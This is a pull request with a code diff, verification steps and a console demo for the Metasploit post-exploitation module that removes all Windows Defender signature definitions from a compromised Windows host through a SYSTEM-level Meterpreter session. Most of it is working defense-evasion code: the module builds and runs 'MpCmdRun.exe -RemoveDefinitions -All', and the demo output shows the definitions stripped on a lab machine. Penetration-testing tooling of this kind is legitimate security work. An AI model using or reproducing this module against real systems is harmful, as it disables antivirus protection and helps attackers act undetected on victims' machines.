### PR TITLE
Fix #16999 by using a compatible default action

### DIFF
--- a/modules/post/windows/manage/rollback_defender_signatures.rb
+++ b/modules/post/windows/manage/rollback_defender_signatures.rb
@@ -28,6 +28,11 @@ class MetasploitModule < Msf::Post
         ], # Module author
         'Platform' => [ 'win' ],
         'SessionTypes' => [ 'meterpreter' ],
+        'Actions' => [
+          [ 'ROLLBACK', { 'Description' => 'Rollback Defender signatures' } ],
+          [ 'UPDATE', { 'Description' => 'Update Defender signatures' } ]
+        ],
+        'DefaultAction' => 'ROLLBACK',
         'Compat' => {
           'Meterpreter' => {
             'Commands' => %w[
@@ -35,48 +40,54 @@ class MetasploitModule < Msf::Post
             ]
           }
         },
+        'Notes' => {
+          # if you rollback the signatures, that resource is lost
+          'Stability' => [SERVICE_RESOURCE_LOSS],
+          'Reliability' => [],
+          'SideEffects' => []
+        }
       )
-    )
-    register_options(
-      [
-        OptEnum.new('ACTION', [ true, 'Action to perform (Update/Rollback)', 'Rollback', ['rollback', 'update']])
-      ]
     )
   end
 
   def run
     # Are we system?
-    if not is_system?()
-      fail_with(Failure::NoAccess, "You must be System to run this Module")
+    if !is_system?
+      fail_with(Failure::NoAccess, 'You must be System to run this Module')
     end
+
     # Is the binary there?
-    program_path = session.sys.config.getenv('ProgramFiles')
+    if client.arch == ARCH_X86 && client.arch != sysinfo['Architecture']
+      program_path = session.sys.config.getenv('ProgramW6432')
+    else
+      program_path = session.sys.config.getenv('ProgramFiles')
+    end
     vprint_status("program_path = #{program_path}")
     file_path = program_path + '\Windows Defender\MpCmdRun.exe'
     vprint_status("file_path = #{file_path}")
-    if not exist?(file_path)
+    if !exist?(file_path)
       fail_with(Failure::NoAccess, "#{file_path} is not Present")
     end
     # Is defender even enabled?
-    defender_disable_key = "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender"
-    disable_key_value = meterpreter_registry_getvalinfo(defender_disable_key, "DisableAntiSpyware", REGISTRY_VIEW_NATIVE)
-    if disable_key_value.nil? || disable_key_value != 1
-      print_status("Removing All Definitions for Windows Defender")
-      print_status(datastore['ACTION'])
-      if datastore['ACTION'].casecmp('Rollback') == 0
-        cmd = "cmd.exe /c \"#{file_path}\" -RemoveDefinitions -All"
-      else
-        cmd = "cmd.exe /c \"#{file_path}\" -SignatureUpdate"
-      end
-      print_status("Running #{cmd}")
-      output = cmd_exec(cmd)
-      if output.include?('denied')
-        print_bad("#{output}")
-      else
-        print_status("#{output}")
-      end
+    defender_disable_key = 'HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender'
+    disable_key_value = meterpreter_registry_getvalinfo(defender_disable_key, 'DisableAntiSpyware', REGISTRY_VIEW_NATIVE)
+    unless disable_key_value.nil? || disable_key_value != 1
+      fail_with(Failure::NoTarget, 'Defender is not enabled')
+    end
+
+    print_status('Removing all definitions for Windows Defender')
+
+    if datastore['ACTION'].casecmp('Rollback') == 0
+      cmd = "cmd.exe /c \"#{file_path}\" -RemoveDefinitions -All"
     else
-      fail_with(Failure::BadConfig, "Defender is not Enabled")
+      cmd = "cmd.exe /c \"#{file_path}\" -SignatureUpdate"
+    end
+    print_status("Running #{cmd}")
+    output = cmd_exec(cmd).to_s
+    if output.include?('denied')
+      print_bad(output)
+    else
+      print_status(output)
     end
   end
 end


### PR DESCRIPTION
This updates the `post/windows/manage/rollback_defender_signatures` module with the following changes:

* Fixes #16999 by setting the default action to a value that is actually acceptable. Also switches from the datastore to an actual ACTION so the user gets the action names as commands.
* Fixes WOW64 compatibility by getting the proper program path
* Applies rubocop changes

## Verification

- [x] Start `msfconsole`
- [x] Get a 32-bit Meterpreter session on a 64-bit Windows target, leave it running as NT AUTHORITY\SYSTEM
- [x] `use post/windows/manage/rollback_defender_signatures`
- [x] Set the `SESSION`, **leave the ACTION in its default value**
- [x] See that you can run the module without setting the action

Prior to these changes the module would have first failed because `Rollback` was not an acceptable action name. Then it would have failed because it didn't identify the correct path to `MpRunCmd.exe` because it's a 32-bit meterpreter on a 64-bit version of Windows and `MpCmdRun.exe` does not exist in `C:\Program Files (x86)`.

## Demo
```
msf6 post(windows/manage/rollback_defender_signatures) > reload
[*] Reloading module...
msf6 post(windows/manage/rollback_defender_signatures) > show options 

Module options (post/windows/manage/rollback_defender_signatures):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  -1               yes       The session to run this module on


Post action:

   Name      Description
   ----      -----------
   ROLLBACK  Rollback Defender signatures


msf6 post(windows/manage/rollback_defender_signatures) > rollback

[*] program_path = C:\Program Files
[*] file_path = C:\Program Files\Windows Defender\MpCmdRun.exe
[*] Removing all definitions for Windows Defender
[*] Running cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
[*] 
Service Version: 4.18.2207.7
Engine Version: 1.1.19600.3
AntiSpyware Signature Version: 1.375.388.0
AntiVirus Signature Version: 1.375.388.0

Starting engine and signature rollback to none...
Done!
[*] Post module execution completed
msf6 post(windows/manage/rollback_defender_signatures) > update

[*] program_path = C:\Program Files
[*] file_path = C:\Program Files\Windows Defender\MpCmdRun.exe
[*] Removing all definitions for Windows Defender
[*] Running cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -SignatureUpdate
[*] Signature update started . . .
Signature update finished.
[*] Post module execution completed
msf6 post(windows/manage/rollback_defender_signatures) > sessions

Active sessions
===============

  Id  Name  Type                     Information               Connection
  --  ----  ----                     -----------               ----------
  3         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ DC  192.168.159.128:4444 -> 192.168.159.10:52305 (192.168.159.10)

msf6 post(windows/manage/rollback_defender_signatures) > 
```
